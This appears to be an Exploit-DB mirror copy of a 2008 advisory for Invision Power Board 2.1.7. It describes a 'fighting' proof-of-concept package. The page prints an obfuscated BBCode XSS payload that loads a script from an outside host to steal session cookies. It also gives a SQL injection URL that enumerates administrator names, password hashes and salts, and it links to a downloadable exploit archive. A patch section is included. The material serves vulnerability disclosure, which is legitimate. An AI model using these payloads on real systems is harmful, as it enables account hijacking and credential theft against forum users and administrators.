bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4841.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

94 lines
No EOL
3.7 KiB
Text
Raw Blame History

----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
----[ NITRO ... ]
This vulnerability was already found before, but there was no available
public "figting" exploit for it. This POC consists of several parts - active xss generator,
JS-file, which will be caused at visiting page with xss, log viewer and special component,
which will take necessary data from MySQL forum's tables in case if intercepted session
belonged to the person with moderator privileges.
----[ ANALYSIS ... ]
XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for
future injetion on the forum board. As the reference it is necessary to specify the full way
up to ya.js file (in which you have already preliminary corrected way on your own). Most likely
it is necessary only to press the button.
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]
The injection can be executed only when there is available session of the user with access
in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval"
function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
----[ PATCH ... ]
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
ON
if ( preg_match( "/[?&;\<\[]/", $url) )
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
ON
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}
www.underwater.itdefence.ru/isniff.rar
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4841.rar (2008-isniff.rar)
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
OSVDB: 51280, 51281
# milw0rm.com [2008-01-05]
Reference in a new issue View git blame Copy permalink